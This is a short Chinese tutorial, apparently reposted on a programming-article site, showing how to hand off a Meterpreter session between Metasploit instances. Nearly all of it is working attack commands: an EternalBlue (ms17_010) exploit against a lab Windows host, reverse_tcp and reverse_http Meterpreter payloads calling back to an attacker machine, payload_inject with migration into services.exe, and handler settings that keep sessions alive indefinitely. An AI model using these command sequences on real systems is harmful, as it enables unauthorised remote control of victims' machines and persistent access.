MSF派生给另外MSF,meterpreter派生给另外meterpreter,Metasploit

本文主要是介绍MSF派生给另外MSF,meterpreter派生给另外meterpreter,Metasploit，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

首先是通过ms17_010永恒之蓝拿下shell,192.168.50.146为受害者靶机,192.168.50.130为kali的ip

set autorunscript post/windows/manage/migrate name=services.exe
set payload windows/x64/meterpreter/reverse_tcp
set lport 5577
set lhost 192.168.50.130
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.50.146
set rport 445
exploit -j -z

接下来在另外的msf里,做好监听3333:

handler -H 192.168.50.130 -P 3333 -p windows/meterpreter/reverse_tcp;

然后在上面的meterpreter 里:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.50.130
set lport 3333
set DisablePayloadHandler True
set PrependMigrate True
set session 1   
run

这样就可以退出使用ms17_010拿下的session了

如上使用的是reverse_tcp,其实reverse_http,也是一样的可以:

在另外的msf里,做好监听7777:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.130
set lport 18080
set ExitOnSession false
set SessionExpirationTimeout 0 
set SessionCommunicationTimeout 0 
exploit -j -z

然后在旧session里派生:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.130
set lport 18080
set DisablePayloadHandler True
set PrependMigrate True
set session 1
run

run后大概需要15-20秒才能完全建立新session.

这篇关于MSF派生给另外MSF,meterpreter派生给另外meterpreter,Metasploit的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---